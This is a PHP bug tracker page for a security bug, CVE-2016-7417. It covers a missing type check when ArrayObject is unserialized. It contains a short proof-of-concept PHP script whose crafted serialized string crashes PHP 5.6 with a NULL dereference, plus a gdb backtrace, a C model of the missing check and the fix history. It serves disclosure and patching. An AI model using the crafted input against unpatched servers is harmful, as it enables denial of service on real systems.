Sec Bug #73029 Missing type check when unserializing SplArray
Submitted: 2016-09-06 09:45 UTC Modified: 2016-09-16 13:41 UTC
From: ahihibughunter at gmail dot com Assigned: stas (profile)
Status: Closed Package: SPL related
PHP Version: 5.6.26RC1 OS: ALL
Private report: No CVE-ID: 2016-7417
 [2016-09-06 09:45 UTC] ahihibughunter at gmail dot com
Description:
------------
The return value is not checked before it is used in spl_array_get_dimension_ptr_ptr

static zval **spl_array_get_dimension_ptr_ptr(int check_inherited, zval *object, zval *offset, int type TSRMLS_DC) /* {{{ */
{
....
HashTable *ht = spl_array_get_hash_table(intern, 0 TSRMLS_CC); /* <--- ht is not checked for NULL here */

} 

Test script:
---------------
<?php
// ArrayObject custom-serialized with a back-reference as its storage instead of an array
$a = 'C:11:"ArrayObject":19:{x:i:0;r:2;;m:a:0:{}}';
$m = unserialize($a);
$x = $m[2]; // dimension read reaches spl_array_get_dimension_ptr_ptr with a NULL hash table
?>

Expected result:
----------------
No crash

Actual result:
--------------
$ gdb /data/php-src-PHP-5.6.26/sapi/cli/php
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
(gdb) r se.php
Starting program: /data/php-src-PHP-5.6.26/sapi/cli/php se.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x0000000000ac08e3 in _zend_is_inconsistent (ht=0x0, file=0x10d3b78 "/data/php-src-PHP-5.6.26/Zend/zend_hash.c",
    line=938) at /data/php-src-PHP-5.6.26/Zend/zend_hash.c:60
60              if (ht->inconsistent==HT_OK) {
(gdb) bt
#0  0x0000000000ac08e3 in _zend_is_inconsistent (ht=0x0, file=0x10d3b78 "/data/php-src-PHP-5.6.26/Zend/zend_hash.c",
    line=938) at /data/php-src-PHP-5.6.26/Zend/zend_hash.c:60
#1  0x0000000000ac3625 in zend_hash_index_find (ht=0x0, h=2, pData=0x7fffffffaaf0)
    at /data/php-src-PHP-5.6.26/Zend/zend_hash.c:938
#2  0x000000000089621a in spl_array_get_dimension_ptr_ptr (check_inherited=1, object=0x7ffff7fc50b8,
    offset=0x7ffff7fc7940, type=0) at /data/php-src-PHP-5.6.26/ext/spl/spl_array.c:357
#3  0x000000000089664b in spl_array_read_dimension_ex (check_inherited=1, object=0x7ffff7fc50b8,
    offset=0x7ffff7fc7940, type=0) at /data/php-src-PHP-5.6.26/ext/spl/spl_array.c:406
#4  0x000000000089679b in spl_array_read_dimension (object=0x7ffff7fc50b8, offset=0x7ffff7fc7940, type=0)
    at /data/php-src-PHP-5.6.26/ext/spl/spl_array.c:434
#5  0x0000000000af40b6 in zend_fetch_dimension_address_read (result=0x7ffff7f901e0, container=0x7ffff7fc50b8,
    dim=0x7ffff7fc7940, dim_type=1, type=0) at /data/php-src-PHP-5.6.26/Zend/zend_execute.c:1364
#6  0x0000000000b4ae0a in ZEND_FETCH_DIM_R_SPEC_CV_CONST_HANDLER (execute_data=0x7ffff7f90260)
    at /data/php-src-PHP-5.6.26/Zend/zend_vm_execute.h:32849
#7  0x0000000000af5196 in execute_ex (execute_data=0x7ffff7f90260)
    at /data/php-src-PHP-5.6.26/Zend/zend_vm_execute.h:363
#8  0x0000000000af521f in zend_execute (op_array=0x7ffff7fc5fd8)
    at /data/php-src-PHP-5.6.26/Zend/zend_vm_execute.h:388
#9  0x0000000000ab0372 in zend_execute_scripts (type=8, retval=0x0, file_count=3)
    at /data/php-src-PHP-5.6.26/Zend/zend.c:1341
#10 0x0000000000a15aa2 in php_execute_script (primary_file=0x7fffffffd200)
    at /data/php-src-PHP-5.6.26/main/main.c:2613
#11 0x0000000000b64a18 in do_cli (argc=2, argv=0x1460a90) at /data/php-src-PHP-5.6.26/sapi/cli/php_cli.c:994
#12 0x0000000000b65d71 in main (argc=2, argv=0x1460a90) at /data/php-src-PHP-5.6.26/sapi/cli/php_cli.c:1378
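An added model of the type check the fix title describes, written for this page and not PHP's own code: it parses the body of ArrayObject's custom serialization (`x:i:<flags>;<storage>;m:<members>`, the layout used by the test script above) and rejects a storage token that is not an array or object, the condition that otherwise leaves spl_array_get_hash_table with nothing to return. The function names and the text-level check are assumptions; php-src applies the equivalent check to the unserialized value rather than to the serialized text.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Constructed model (not PHP's code) of the body handed to ArrayObject's
 * custom unserializer: "x:i:<flags>;<storage>;m:<members>". */
enum spl_check { SPL_OK = 0, SPL_MALFORMED = 1, SPL_BAD_STORAGE_TYPE = 2 };

/* Returns the one-letter type tag of the <storage> token, or 0 when the
 * "x:i:<digits>;" header is malformed. */
static char spl_storage_type(const char *body)
{
    const char *p = body;
    if (strncmp(p, "x:i:", 4) != 0) return 0;
    p += 4;
    if (*p == '-') p++;
    if (!isdigit((unsigned char)*p)) return 0;
    while (isdigit((unsigned char)*p)) p++;
    if (*p != ';') return 0;
    p++;
    /* Every serialized value starts with its type tag followed by ':',
     * except "N;" for null. */
    if (*p == '\0') return 0;
    if (*p != 'N' && p[1] != ':') return 0;
    return *p;
}

/* The missing check: only an array ('a') or an object ('O', or 'C' for an
 * object with a custom unserializer) may back the ArrayObject. Back-references
 * ('r'/'R') are rejected as well, since they can resolve to an earlier scalar
 * such as the flags integer; this is stricter than resolving the reference. */
enum spl_check spl_check_storage(const char *body)
{
    char t = spl_storage_type(body);
    if (t == 0) return SPL_MALFORMED;
    if (t == 'a' || t == 'O' || t == 'C') return SPL_OK;
    return SPL_BAD_STORAGE_TYPE;
}

int main(void)
{
    /* Constructed inputs: the body from the report's test script and a sane one. */
    const char *poc  = "x:i:0;r:2;;m:a:0:{}";
    const char *sane = "x:i:0;a:0:{};m:a:0:{}";
    printf("poc: %d, sane: %d\n", spl_check_storage(poc), spl_check_storage(sane));
    return 0;
}
```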

History

 [2016-09-12 02:53 UTC] stas@php.net
-Summary: _zend_is_inconsistent null dereference +Summary: Missing type check when unserializing SplArray
 [2016-09-12 03:38 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-09-12 03:38 UTC] stas@php.net
The fix is in security repo as 6d16288150be33392a3249e417a0929881feb9a2 and in https://gist.github.com/b243ac0ce783c0d286d2619e3d6651d6

please verify
 [2016-09-12 04:23 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2016-09-12 05:13 UTC] ahihibughunter at gmail dot com
This patch looks OK.
 [2016-09-13 04:04 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ecb7f58a069be0dec4a6131b6351a761f808f22e
Log: Fix bug #73029 - Missing type check when unserializing SplArray
 [2016-09-13 04:04 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-09-13 04:06 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=022e75cba104c52ccfb494ce224c2c4d0ff2dddc
Log: Fix bug #73029 - Missing type check when unserializing SplArray
 [2016-09-13 04:09 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=022e75cba104c52ccfb494ce224c2c4d0ff2dddc
Log: Fix bug #73029 - Missing type check when unserializing SplArray
 [2016-09-13 04:11 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=022e75cba104c52ccfb494ce224c2c4d0ff2dddc
Log: Fix bug #73029 - Missing type check when unserializing SplArray
 [2016-09-13 09:02 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ecb7f58a069be0dec4a6131b6351a761f808f22e
Log: Fix bug #73029 - Missing type check when unserializing SplArray
 [2016-09-15 09:30 UTC] tyrael@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=589cfc7d0ebbc2399b6cbac3351ae26d569e9600
Log: Fix bug #73029 - Missing type check when unserializing SplArray
 [2016-09-16 13:41 UTC] kaplan@php.net
-CVE-ID: needed +CVE-ID: 2016-7417
 [2016-10-17 10:08 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=ecb7f58a069be0dec4a6131b6351a761f808f22e
Log: Fix bug #73029 - Missing type check when unserializing SplArray
 [2016-10-17 10:08 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=022e75cba104c52ccfb494ce224c2c4d0ff2dddc
Log: Fix bug #73029 - Missing type check when unserializing SplArray
 [2021-05-31 09:38 UTC] hu dot chuckie at gmail dot com
The following pull request has been associated:

Patch Name: Add commit ID to build info
On GitHub:  https://github.com/php/doc-base/pull/17
Patch:      https://github.com/php/doc-base/pull/17.patch
 [2021-05-31 09:39 UTC] hu dot chuckie at gmail dot com
The following pull request has been associated:

Patch Name: Add filter-related translations
On GitHub:  https://github.com/php/doc-zh/pull/17
Patch:      https://github.com/php/doc-zh/pull/17.patch
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Nov 21 14:01:29 2024 UTC